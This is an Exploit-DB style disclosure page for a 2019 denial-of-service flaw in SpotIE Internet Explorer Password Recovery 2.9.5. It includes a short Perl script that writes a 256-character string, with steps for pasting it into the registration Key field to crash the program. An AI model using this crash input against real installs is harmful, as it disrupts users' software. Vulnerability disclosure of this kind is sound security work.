SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service (DoS)

vendor:

SpotIE Internet Explorer Password Recovery

by:

Emilio Revelo

7.5

CVSS

HIGH

Denial of Service (DoS)

CWE

Product Name: SpotIE Internet Explorer Password Recovery

Affected Version From: 2.9.2005

Affected Version To: 2.9.2005

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 Pro x64

2019

SpotIE Internet Explorer Password Recovery 2.9.5 – ‘Key’ Denial of Service (DoS)

This exploit allows an attacker to cause a denial of service (crash) in SpotIE Internet Explorer Password Recovery 2.9.5. By providing a long string as the 'Key' parameter, the application crashes. This vulnerability can be exploited by running a Perl script provided by the author and following the steps outlined in the script.

Mitigation:

The vendor has not provided a patch or mitigation for this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service (DoS)
# Exploit Author: Emilio Revelo
# Date: 2019-09-20
# Software Link : http://www.nsauditor.com/downloads/spotie_setup.exe
# Tested on: Windows 10 Pro x64 es

# Steps to produce the DoS: 

# 1.- Run perl script : perl SpotIE.pl
# 2.- Open SpotIE.txt and copy the content to clipboard
# 3.- Open SpotIE Internet Explorer Password Recovery
# 4.- Navigate to Register -> Enter the registration name and key below...
# 5.- Paste ClipBoard on "Key:"
# 7.- OK
# 8.- Crashed!!

#!/usr/local/bin/perl

use strict;
use warnings;

my $filename = 'SpotIE.txt';
open(my $fh, '>', $filename) or die "Could not open file '$filename' $!";
print $fh "E"x256;
close $fh;
print "Done!\n";
print "File: SpotIE.txt\n"